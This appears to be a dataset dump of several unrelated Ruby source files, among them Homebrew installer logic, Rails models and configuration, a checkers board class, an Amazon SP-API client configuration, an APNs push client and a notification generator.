linked_keg = Keg.new(df.linked_keg.resolved_path)
linked_keg.unlink
end
if df.installed?
installed_keg = Keg.new(df.prefix)
tmp_keg = Pathname.new("#{installed_keg}.tmp")
installed_keg.rename(tmp_keg)
end
fi = DependencyInstaller.new(df)
fi.options |= tab.used_options
fi.options |= dep.options
fi.options |= inherited_options
fi.build_from_source = build_from_source?
fi.verbose = verbose? unless verbose == :quieter
fi.debug = debug?
fi.prelude
oh1 "Installing #{f} dependency: #{Tty.green}#{dep.name}#{Tty.reset}"
fi.install
fi.caveats
fi.finish
rescue Exception
ignore_interrupts do
tmp_keg.rename(installed_keg) if tmp_keg && !installed_keg.directory?
linked_keg.link if linked_keg
end
raise
else
ignore_interrupts { tmp_keg.rmtree if tmp_keg && tmp_keg.directory? }
end
def caveats
return if only_deps?
if ARGV.homebrew_developer? and not f.keg_only?
audit_bin
audit_sbin
audit_lib
audit_man
audit_info
end
c = Caveats.new(f)
unless c.empty?
@show_summary_heading = true
ohai 'Caveats', c.caveats
end
end
def finish
return if only_deps?
ohai 'Finishing up' if verbose?
install_plist
if f.keg_only?
begin
Keg.new(f.prefix).optlink
rescue Exception
onoe "Failed to create: #{f.opt_prefix}"
puts "Things that depend on #{f} will probably not build."
end
else
link
end
fix_install_names if OS.mac?
post_install
ohai "Summary" if verbose? or show_summary_heading?
puts summary
ensure
unlock if hold_locks?
end
def emoji
ENV['HOMEBREW_INSTALL_BADGE'] || "\xf0\x9f\x8d\xba"
end
def summary
s = ""
s << "#{emoji} " if MacOS.version >= :lion and not ENV['HOMEBREW_NO_EMOJI']
s << "#{f.prefix}: #{f.prefix.abv}"
s << ", built in #{pretty_duration build_time}" if build_time
s
end
def build_time
@build_time ||= Time.now - @start_time if @start_time && !interactive?
end
def sanitized_ARGV_options
args = []
args << "--ignore-dependencies" if ignore_deps?
if build_bottle?
args << "--build-bottle"
args << "--bottle-arch=#{ARGV.bottle_arch}" if ARGV.bottle_arch
end
if interactive?
args << "--interactive"
args << "--git" if interactive == :git
end
args << "--verbose" if verbose?
args << "--debug" if debug?
args << "--cc=#{ARGV.cc}" if ARGV.cc
args << "--env=#{ARGV.env}" if ARGV.env
args << "--HEAD" if ARGV.build_head?
args << "--devel" if ARGV.build_devel?
f.build.each do |opt, _|
name = opt.name[/\A(.+)=\z$/, 1]
value = ARGV.value(name)
args << "--#{name}=#{value}" if name && value
end
args
end
def build_argv
opts = Options.coerce(sanitized_ARGV_options)
opts.concat(options)
opts
end
def build
FileUtils.rm Dir["#{HOMEBREW_LOGS}/#{f}/*"]
@start_time = Time.now
# 1. formulae can modify ENV, so we must ensure that each
# installation has a pristine ENV when it starts, forking now is
# the easiest way to do this
# 2. formulae have access to __END__ the only way to allow this is
# to make the formula script the executed script
read, write = IO.pipe
# I'm guessing this is not a good way to do this, but I'm no UNIX guru
ENV['HOMEBREW_ERROR_PIPE'] = write.to_i.to_s
args = %W[
nice #{RUBY_PATH}
-W0
-I #{File.dirname(__FILE__)}
-rbuild
--
#{f.path}
].concat(build_argv)
# Ruby 2.0+ sets close-on-exec on all file descriptors except for
# 0, 1, and 2 by default, so we have to specify that we want the pipe
# to remain open in the child process.
args << { write => write } if RUBY_VERSION >= "2.0"
pid = fork do
begin
read.close
exec(*args)
rescue Exception => e
Marshal.dump(e, write)
write.close
exit! 1
end
end
ignore_interrupts(:quietly) do # the child will receive the interrupt and marshal it back
write.close
Process.wait(pid)
data = read.read
read.close
raise Marshal.load(data) unless data.nil? or data.empty?
raise Interrupt if $?.exitstatus == 130
raise "Suspicious installation failure" unless $?.success?
end
raise "Empty installation" if Dir["#{f.prefix}/*"].empty?
rescue Exception
ignore_interrupts do
# any exceptions must leave us with nothing installed
f.prefix.rmtree if f.prefix.directory?
f.rack.rmdir_if_possible
end
raise
end
def link
if f.linked_keg.directory? and f.linked_keg.resolved_path == f.prefix
opoo "This keg was marked linked already, continuing anyway"
# otherwise Keg.link will bail
f.linked_keg.unlink
end
keg = Keg.new(f.prefix)
begin
keg.link
rescue Keg::LinkError => e
onoe "The `brew link` step did not complete successfully"
puts "The formula built, but is not symlinked into #{HOMEBREW_PREFIX}"
puts "You can try again using:"
puts " brew link #{f.name}"
puts
puts "Possible conflicting files are:"
mode = OpenStruct.new(:dry_run => true, :overwrite => true)
keg.link(mode)
@show_summary_heading = true
rescue Exception => e
onoe "An unexpected error occurred during the `brew link` step"
puts "The formula built, but is not symlinked into #{HOMEBREW_PREFIX}"
puts e
puts e.backtrace if debug?
@show_summary_heading = true
ignore_interrupts { keg.unlink }
raise
end
end
def install_plist
return unless f.plist
f.plist_path.atomic_write(f.plist)
f.plist_path.chmod 0644
rescue Exception => e
onoe "Failed to install plist file"
ohai e, e.backtrace if debug?
end
def fix_install_names
keg = Keg.new(f.prefix)
keg.fix_install_names(:keg_only => f.keg_only?)
if @poured_bottle
keg.relocate_install_names Keg::PREFIX_PLACEHOLDER, HOMEBREW_PREFIX.to_s,
Keg::CELLAR_PLACEHOLDER, HOMEBREW_CELLAR.to_s, :keg_only => f.keg_only?
end
rescue Exception => e
onoe "Failed to fix install names"
puts "The formula built, but you may encounter issues using it or linking other"
puts "formula against it."
ohai e, e.backtrace if debug?
@show_summary_heading = true
end
def clean
ohai "Cleaning" if verbose?
Cleaner.new(f).clean
rescue Exception => e
opoo "The cleaning step did not complete successfully"
puts "Still, the installation was successful, so we will link it into your prefix"
ohai e, e.backtrace if debug?
@show_summary_heading = true
end
def post_install
f.post_install
rescue Exception => e
opoo "The post-install step did not complete successfully"
puts "You can try again using `brew postinstall #{f.name}`"
ohai e, e.backtrace if debug?
@show_summary_heading = true
end
def pour
if Homebrew::Hooks::Bottles.formula_has_bottle?(f)
return if Homebrew::Hooks::Bottles.pour_formula_bottle(f)
end
if f.local_bottle_path
downloader = LocalBottleDownloadStrategy.new(f)
else
bottle = f.bottle
downloader = bottle.downloader
bottle.verify_download_integrity(bottle.fetch)
end
HOMEBREW_CELLAR.cd do
downloader.stage
end
Dir["#{f.bottle_prefix}/{etc,var}/**/*"].each do |file|
path = Pathname.new(file)
path.extend(InstallRenamed)
path.cp_path_sub(f.bottle_prefix, HOMEBREW_PREFIX)
end
FileUtils.rm_rf f.bottle_prefix
end
## checks
def print_check_output warning_and_description
return unless warning_and_description
warning, description = *warning_and_description
opoo warning
puts description
@show_summary_heading = true
end
def audit_bin
print_check_output(check_PATH(f.bin)) unless f.keg_only?
print_check_output(check_non_executables(f.bin))
print_check_output(check_generic_executables(f.bin))
end
def audit_sbin
print_check_output(check_PATH(f.sbin)) unless f.keg_only?
print_check_output(check_non_executables(f.sbin))
print_check_output(check_generic_executables(f.sbin))
end
def audit_lib
print_check_output(check_jars)
print_check_output(check_non_libraries)
end
def audit_man
print_check_output(check_manpages)
end
def audit_info
print_check_output(check_infopages)
end
private
def hold_locks?
@hold_locks || false
end
def lock
if (@@locked ||= []).empty?
f.recursive_dependencies.each do |dep|
@@locked << dep.to_formula
end unless ignore_deps?
@@locked.unshift(f)
@@locked.uniq!
@@locked.each(&:lock)
@hold_locks = true
end
end
def unlock
if hold_locks?
@@locked.each(&:unlock)
@@locked.clear
@hold_locks = false
end
end
end
class Formula
def keg_only_text
s = "This formula is keg-only, so it was not symlinked into #{HOMEBREW_PREFIX}."
s << "\n\n#{keg_only_reason.to_s}"
if lib.directory? or include.directory?
s <<
<<-EOS.undent_________________________________________________________72
Generally there are no consequences of this for you. If you build your
own software and it requires this formula, you'll need to add to your
build variables:
EOS
s << " LDFLAGS: -L#{HOMEBREW_PREFIX}/opt/#{name}/lib\n" if lib.directory?
s << " CPPFLAGS: -I#{HOMEBREW_PREFIX}/opt/#{name}/include\n" if include.directory?
end
s << "\n"
end
end
| 27.043069 | 124 | 0.661275 |
bf07ffe9c3653b1d77f1640f3b429fdad7e4ed8e | 358 | # frozen_string_literal: true
require_dependency "participant_profile/ecf"
class ParticipantProfile < ApplicationRecord
class ECT < ECF
belongs_to :mentor_profile, class_name: "Mentor", optional: true
has_one :mentor, through: :mentor_profile, source: :user
def ect?
true
end
def participant_type
:ect
end
end
end
| 18.842105 | 68 | 0.715084 |
39d34f353afef3ef2d6b8c012421dd00900a44a2 | 257 | class Review < ActiveRecord::Base
belongs_to :product
validates :author, presence: true
validates :content, presence: true
validates :rating, presence: true, numericality: true, inclusion: { in: 1..5, message: "Rating must be between 1 and 5" }
end
| 36.714286 | 123 | 0.735409 |
d516a7f56bdd418f86fee47e17ebbab5a4dad6f1 | 1,689 | require_relative 'piece'
require_relative '../chess_utils/chess_utils'
class Board
include ChessUtils::Renderable
SIZE = 8
def initialize
@rows = Array.new(SIZE) { Array.new(SIZE) }
end
def [](pos)
row, col = pos
rows[row][col]
end
def []=(pos, mark)
row, col = pos
rows[row][col] = mark
end
def in_range?(pos)
pos.all? { |coord| coord.between?(0, SIZE - 1) }
end
def fill_rows
(0..2).each { |row| fill_row(row, :red) }
(SIZE-3...SIZE).each { |row| fill_row(row, :blue) }
end
def add_piece(piece, pos)
raise 'space not empty' unless empty?(pos)
self[pos] = piece
end
def move_piece(start_pos, end_pos)
piece = self[end_pos] = self[start_pos]
self[start_pos] = nil
end
def remove_piece(piece)
self[piece.pos] = nil
end
def empty?(pos)
return false unless in_range?(pos)
self[pos].nil?
end
def piece?(pos)
return false unless in_range?(pos)
!empty?(pos)
end
def pieces
rows.flatten.compact
end
def won?
pieces.map(&:color).uniq.one?
end
def winner
pieces.first.color
end
def dup
duped_board = self.class.new
pieces.each do |piece|
Piece.new(
board: duped_board,
pos: piece.pos,
color: piece.color,
king: piece.king?,
deltas: piece.deltas
)
end
duped_board
end
protected
attr_reader :rows
private
def fill_row(row, color)
starting_coord = (row.even? ? 0 : 1)
(starting_coord...SIZE).step(2) do |col|
pos = [row, col]
Piece.new(
board: self,
pos: pos,
color: color
)
end
end
end
| 15.933962 | 55 | 0.586738 |
62cc45cb064c4a1df0817fa5cec343923289d562 | 5,950 | =begin
#Selling Partner API for Direct Fulfillment Shipping
#The Selling Partner API for Direct Fulfillment Shipping provides programmatic access to a direct fulfillment vendor's shipping data.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
module AmzSpApi::VendorDirectFulfillmentShippingApiModel
class Configuration
# Defines url scheme
attr_accessor :scheme
# Defines url host
attr_accessor :host
# Defines url base path
attr_accessor :base_path
# Defines API keys used with API Key authentications.
#
# @return [Hash] key: parameter name, value: parameter value (API key)
#
# @example parameter name is "api_key", API key is "xxx" (e.g. "api_key=xxx" in query string)
# config.api_key['api_key'] = 'xxx'
attr_accessor :api_key
# Defines API key prefixes used with API Key authentications.
#
# @return [Hash] key: parameter name, value: API key prefix
#
# @example parameter name is "Authorization", API key prefix is "Token" (e.g. "Authorization: Token xxx" in headers)
# config.api_key_prefix['api_key'] = 'Token'
attr_accessor :api_key_prefix
# Defines the username used with HTTP basic authentication.
#
# @return [String]
attr_accessor :username
# Defines the password used with HTTP basic authentication.
#
# @return [String]
attr_accessor :password
# Defines the access token (Bearer) used with OAuth2.
attr_accessor :access_token
# Set this to enable/disable debugging. When enabled (set to true), HTTP request/response
# details will be logged with `logger.debug` (see the `logger` attribute).
# Default to false.
#
# @return [true, false]
attr_accessor :debugging
# Defines the logger used for debugging.
# Default to `Rails.logger` (when in Rails) or logging to STDOUT.
#
# @return [#debug]
attr_accessor :logger
# Defines the temporary folder to store downloaded files
# (for API endpoints that have file response).
# Default to use `Tempfile`.
#
# @return [String]
attr_accessor :temp_folder_path
# The time limit for HTTP request in seconds.
# Default to 0 (never times out).
attr_accessor :timeout
# Set this to false to skip client side validation in the operation.
# Default to true.
# @return [true, false]
attr_accessor :client_side_validation
### TLS/SSL setting
# Set this to false to skip verifying SSL certificate when calling API from https server.
# Default to true.
#
# @note Do NOT set it to false in production code, otherwise you would face multiple types of cryptographic attacks.
#
# @return [true, false]
attr_accessor :verify_ssl
### TLS/SSL setting
# Set this to false to skip verifying SSL host name
# Default to true.
#
# @note Do NOT set it to false in production code, otherwise you would face multiple types of cryptographic attacks.
#
# @return [true, false]
attr_accessor :verify_ssl_host
### TLS/SSL setting
# Set this to customize the certificate file to verify the peer.
#
# @return [String] the path to the certificate file
#
# @see The `cainfo` option of Typhoeus, `--cert` option of libcurl. Related source code:
# https://github.com/typhoeus/typhoeus/blob/master/lib/typhoeus/easy_factory.rb#L145
attr_accessor :ssl_ca_cert
### TLS/SSL setting
# Client certificate file (for client certificate)
attr_accessor :cert_file
### TLS/SSL setting
# Client private key file (for client certificate)
attr_accessor :key_file
# Set this to customize parameters encoding of array parameter with multi collectionFormat.
# Default to nil.
#
# @see The params_encoding option of Ethon. Related source code:
# https://github.com/typhoeus/ethon/blob/master/lib/ethon/easy/queryable.rb#L96
attr_accessor :params_encoding
attr_accessor :inject_format
attr_accessor :force_ending_format
def initialize
@scheme = 'https'
@host = 'sellingpartnerapi-na.amazon.com'
@base_path = 'https://sellingpartnerapi-na.amazon.com/'
@api_key = {}
@api_key_prefix = {}
@timeout = 0
@client_side_validation = true
@verify_ssl = true
@verify_ssl_host = true
@params_encoding = nil
@cert_file = nil
@key_file = nil
@debugging = false
@inject_format = false
@force_ending_format = false
@logger = defined?(Rails) ? Rails.logger : Logger.new(STDOUT)
yield(self) if block_given?
end
# The default Configuration object.
def self.default
@@default ||= Configuration.new
end
def configure
yield(self) if block_given?
end
def scheme=(scheme)
# remove :// from scheme
@scheme = scheme.sub(/:\/\//, '')
end
def host=(host)
# remove http(s):// and anything after a slash
@host = host.sub(/https?:\/\//, '').split('/').first
end
def base_path=(base_path)
# Add leading and trailing slashes to base_path
@base_path = "/#{base_path}".gsub(/\/+/, '/')
@base_path = '' if @base_path == '/'
end
def base_url
"#{scheme}://#{[host, base_path].join('/').gsub(/\/+/, '/')}".sub(/\/+\z/, '')
end
# Gets API key (with prefix if set).
# @param [String] param_name the parameter name of API key auth
def api_key_with_prefix(param_name)
if @api_key_prefix[param_name]
"#{@api_key_prefix[param_name]} #{@api_key[param_name]}"
else
@api_key[param_name]
end
end
# Gets Basic Auth token string
def basic_auth_token
'Basic ' + ["#{username}:#{password}"].pack('m').delete("\r\n")
end
# Returns Auth Settings hash for api client.
def auth_settings
{
}
end
end
end
| 29.899497 | 133 | 0.661176 |
edae7d9e62b91ff28718d09292c10142ac6d89b0 | 4,795 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "js_project_100_days_of_code_api_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 45.235849 | 114 | 0.763295 |
b9e63420120b45ff40396137cc4daa8b461c14e7 | 215 | $LOAD_PATH.unshift(File.dirname(__FILE__))
$LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
require 'sinatra-forms'
require 'spec'
require 'spec/autorun'
Spec::Runner.configure do |config|
end
| 21.5 | 66 | 0.739535 |
ab273739648c4e6ae88020d3e2011ec75ca8e26f | 1,425 | require 'htmlentities'
require 'json'
require_relative 'entry'
class DestinationFeed
def self.write_review_feed( app_name, entries, dest_file_path, dest_feed_url )
json_structure = Hash.new
json_structure['version'] = 'https://jsonfeed.org/version/1'
json_structure['title'] = "App Store Reviews of #{app_name}"
json_structure['home_page_url'] = 'https://itunesconnect.apple.com/'
json_structure['feed_url'] = dest_feed_url
items = Array.new
item_url = "https://itunesconnect.apple.com/"
html_encoder = HTMLEntities.new
if (entries.length == 0)
placeholder_date_string = '2018-01-01T00:00:00+00:00'
entry_element = {'id' => 'placeholder', 'title' => '(placeholder)', 'content_html' => '<p>This is a placeholder, because some services will not allow you to subscribe to a JSON Feed that has an empty list of items.</p>', 'url' => item_url }
items.push(entry_element)
end
entries.each do |entry|
author_element = {'name' => entry.author}
entry_element = {'id' => entry.entry_id, 'title' => entry.title, 'content_html' => entry.html, 'url' => item_url, 'author' => author_element, 'date_published' => entry.date}
items.push(entry_element)
end
json_structure['items'] = items
tmp_file_path = "#{dest_file_path}.tmp"
File.open(tmp_file_path,"w") do |f|
f.write(JSON.pretty_generate(json_structure))
end
File.rename(tmp_file_path, dest_file_path)
end
end | 35.625 | 243 | 0.710175 |
08b7f42b1dda49354b622c458b4076e365a1abe7 | 581 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe 'GET /staff/people/:id' do
let!(:person) { create :initial_person }
let(:current_account) { create :usual_account }
def make_request
get "/staff/people/#{person.id}"
end
before do
sign_in current_account.user if current_account&.user
make_request
end
for_account_types nil, :usual do
specify do
expect(response).to have_http_status :forbidden
end
end
for_account_types :superuser do
specify do
expect(response).to have_http_status :ok
end
end
end
| 19.366667 | 57 | 0.712565 |
4a0c12d81627aaa585b7e0b4dd6824a0e272661a | 597 | # Class for A-B testing variants. A variant is a set of changes
# to the same element on a page. For example, a variant can be used
# to change the button text, or images displayed, or even more
# complicated behavior
class Caboose::AbVariant < ActiveRecord::Base
self.table_name = "ab_variants"
has_many :ab_options, -> { order(:id) }, :dependent => :destroy
has_many :ab_values, :dependent => :destroy
attr_accessible :name, :analytics_name
def random_option
return nil if self.ab_options.nil? || self.ab_options.count == 0
return self.ab_options.sample
end
end
| 33.166667 | 68 | 0.720268 |
28992d9f303bdedd1b670a35b1fee692e4bd290c | 41 | module ItunesCsv
VERSION = "0.0.3"
end
| 10.25 | 19 | 0.682927 |
acbbc919688a915f528cfd7c5235ee5942def447 | 3,718 | class NotificationGenerator < Rails::Generators::Base
source_root File.expand_path('templates', __dir__)
def create_notice
copy_file "notice.rb", "app/models/notice.rb"
end
def create_user_notice
copy_file "user_notice.rb", "app/models/user_notice.rb"
end
def create_notice_controller
copy_file "notices_controller.rb", "app/controllers/notices_controller.rb"
end
def create_user_notice_controller
copy_file "user_notices_controller.rb", "app/controllers/user_notices_controller.rb"
end
def create_notice_index
copy_file "notice_index.rb", "app/views/notices/index.html.slim"
end
def create_header_partial
copy_file "header.rb", "app/views/layouts/_header.html.slim"
end
def get_current_date
@current_date = DateTime.now.strftime("%Y%m%d%H%m%S").to_i
end
def create_notice_migration
get_current_date
copy_file "notice_migration.rb", "db/migrate/#{@current_date + 1}_create_notices.rb"
end
def create_user_notices_migration
get_current_date
copy_file "user_notice_migration.rb", "db/migrate/#{@current_date + 2}_create_user_notices.rb"
end
def notice_javascript
copy_file "notification_javascript.rb", "app/javascript/packs/notification.js"
end
def add_routes
file_path = "#{Rails.root}/config"
routes_files = File.readlines("#{file_path}/routes.rb")
routes_files.each.with_index(0) do |line,index|
if index != (routes_files.count - 1)
File.open("#{file_path}/routes_copy.rb","a") do |f|
f.write(line)
end
end
end
File.open("#{file_path}/routes_copy.rb","a") do |f|
f.write("\n\tresources :notices, only: :index \n\tresources :user_notices, only: :update \nend")
end
File.delete("#{file_path}/routes.rb")
File.rename("#{file_path}/routes_copy.rb","#{file_path}/routes.rb")
end
def notifications_javascript
file_path = "#{Rails.root}/app/javascript/packs"
routes_files = File.readlines("#{file_path}/application.js")
routes_files.each do |line|
File.open("#{file_path}/application_copy.js","a") do |f|
f.write(line)
end
end
File.open("#{file_path}/application_copy.js","a") do |f|
f.write("\nrequire(\"./notification\")")
end
File.delete("#{file_path}/application.js")
File.rename("#{file_path}/application_copy.js","#{file_path}/application.js")
end
def copy_user_associations
contains_private_method = false
file_path = "#{Rails.root}/app/models"
user_file_contents = File.readlines("#{file_path}/user.rb")
user_file_contents.each.with_index(0) do |line,index|
if line.strip == "private"
contains_private_method = true
# Copy the association before the private method
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write("\n\thas_many :user_notices, dependent: :destroy\n\thas_many :notices, through: :user_notices\n\n")
end
end
# Continue copying the file until the last end keyword is encountered
if index != (user_file_contents.count - 1)
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write(line)
end
end
end
# Add associations if there is no private method and the copying has reached the last end keyword
if !contains_private_method
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write("\n\thas_many :user_notices, dependent: :destroy\n\thas_many :notices, through: :user_notices")
end
end
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write("\nend")
end
File.delete("#{file_path}/user.rb")
File.rename("#{file_path}/user_copy.rb","#{file_path}/user.rb")
end
end | 31.777778 | 117 | 0.682087 |
1d0e1b320debef5ae5043b92e29ec5b6250c29b6 | 3,001 | # This file is copied to spec/ when you run 'rails generate rspec:install'
require 'spec_helper'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'rspec/rails'
# Load support files
Dir[Rails.root.join('spec/support/**/*.rb')].each do |f|
require f
end
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each { |f| require f }
# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove these lines.
begin
ActiveRecord::Migration.maintain_test_schema!
rescue ActiveRecord::PendingMigrationError => e
puts e.to_s.strip
exit 1
end
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
# FactoryBot
config.include FactoryBot::Syntax::Methods
# Committee
config.include CommittteeRailsHelper, type: :request
end
| 40.554054 | 86 | 0.746418 |
b9e009f8aadc395df87750926557b62a0cf990ee | 47 | module PivottableRails
VERSION = "0.1.1"
end
| 11.75 | 22 | 0.723404 |
62c9ff9b8b27cffb927557e74c0bc7bde09a37cc | 283 | class StaticPagesController < ApplicationController
def home
if logged_in?
@micropost = current_user.microposts.build
@feed_items = current_user.feed.paginate(page: params[:page])
end
end
def help
end
def about
end
def contact
end
end
| 14.15 | 67 | 0.678445 |
6a8f79745cf81b4ba5fec9482cceea4485dd5e37 | 2,201 | require 'openssl'
require 'jwt'
require 'net-http2'
module P8push
APPLE_PRODUCTION_JWT_URI = 'https://api.push.apple.com'
APPLE_DEVELOPMENT_JWT_URI = 'https://api.development.push.apple.com'
class Client
attr_accessor :jwt_uri
class << self
def development(apn_private_key, apn_team_id, apn_key_id)
client = self.new(apn_private_key, apn_team_id, apn_key_id)
client.jwt_uri = APPLE_DEVELOPMENT_JWT_URI
client
end
def production(apn_private_key, apn_team_id, apn_key_id)
client = self.new(apn_private_key, apn_team_id, apn_key_id)
client.jwt_uri = APPLE_PRODUCTION_JWT_URI
client
end
end
def initialize(apn_private_key, apn_team_id, apn_key_id)
@private_key = Base64.decode64(apn_private_key)
@team_id = apn_team_id
@key_id = apn_key_id
@timeout = Float(ENV['APN_TIMEOUT'] || 2.0)
end
def jwt_http2_post(topic, payload, token)
ec_key = OpenSSL::PKey::EC.new(@private_key)
jwt_token = JWT.encode({iss: @team_id, iat: Time.now.to_i}, ec_key, 'ES256', {kid: @key_id})
client = NetHttp2::Client.new(@jwt_uri)
h = {}
h['content-type'] = 'application/json'
h['apns-expiration'] = '0'
h['apns-priority'] = '10'
h['apns-topic'] = topic
h['authorization'] = "bearer #{jwt_token}"
res = client.call(:post, '/3/device/'+token, body: payload.to_json, timeout: @timeout,
headers: h)
client.close
return nil if res.status.to_i == 200
res.body
end
def push(*notifications)
return if notifications.empty?
notifications.flatten!
notifications.each_with_index do |notification, index|
next unless notification.kind_of?(Notification)
next if notification.sent?
next unless notification.valid?
notification.id = index
err = jwt_http2_post(notification.topic, notification.payload, notification.token)
if err == nil
notification.mark_as_sent!
else
puts err
notification.apns_error_code = err
notification.mark_as_unsent!
end
end
end
end
end
| 29.346667 | 98 | 0.646524 |
335e9fc7a462e1ef67924992de6f26c3dc61c183 | 1,216 | # Copyright 2014 Red Hat, Inc, and individual contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require 'stringio'
java_import org.projectodd.wunderboss.rack.RackChannel
describe 'RackChannel' do
before(:each) do
RackChannel.create_rack_channel_class(JRuby.runtime)
@channel = WunderBoss::RackChannel.new
end
it "doesn't eat newlines when calling gets" do
@channel.io = StringIO.new("foo\nbar")
expect(@channel.gets).to eq("foo\n")
expect(@channel.gets).to eq("bar")
end
it "doesn't read entire input if asked to read more than 4096" do
@channel.io = StringIO.new("foo\nbar" * 1000)
expect(@channel.read(4097).length).to eq(4097)
end
end
| 32 | 74 | 0.737664 |
6af24c741a1a7d3bd7537b884e1b582649929ac7 | 86 | module InspecPlugins
module InputTestFixture
VERSION = '0.1.0'.freeze
end
end
| 14.333333 | 28 | 0.732558 |
ab57787b4d05b783a11eb7712dbb4a335f03e6c8 | 1,273 | require_relative 'lib/cli_gif/version'
Gem::Specification.new do |spec|
spec.name = "cli_gif"
spec.version = CliGif::VERSION
spec.authors = ["Piotr Zientara"]
spec.email = ["[email protected]"]
spec.summary = "A CLI client for Giphy"
spec.description = "Get your gifs from command line"
#spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.3.0")
#spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
#spec.metadata["homepage_uri"] = spec.homepage
#spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
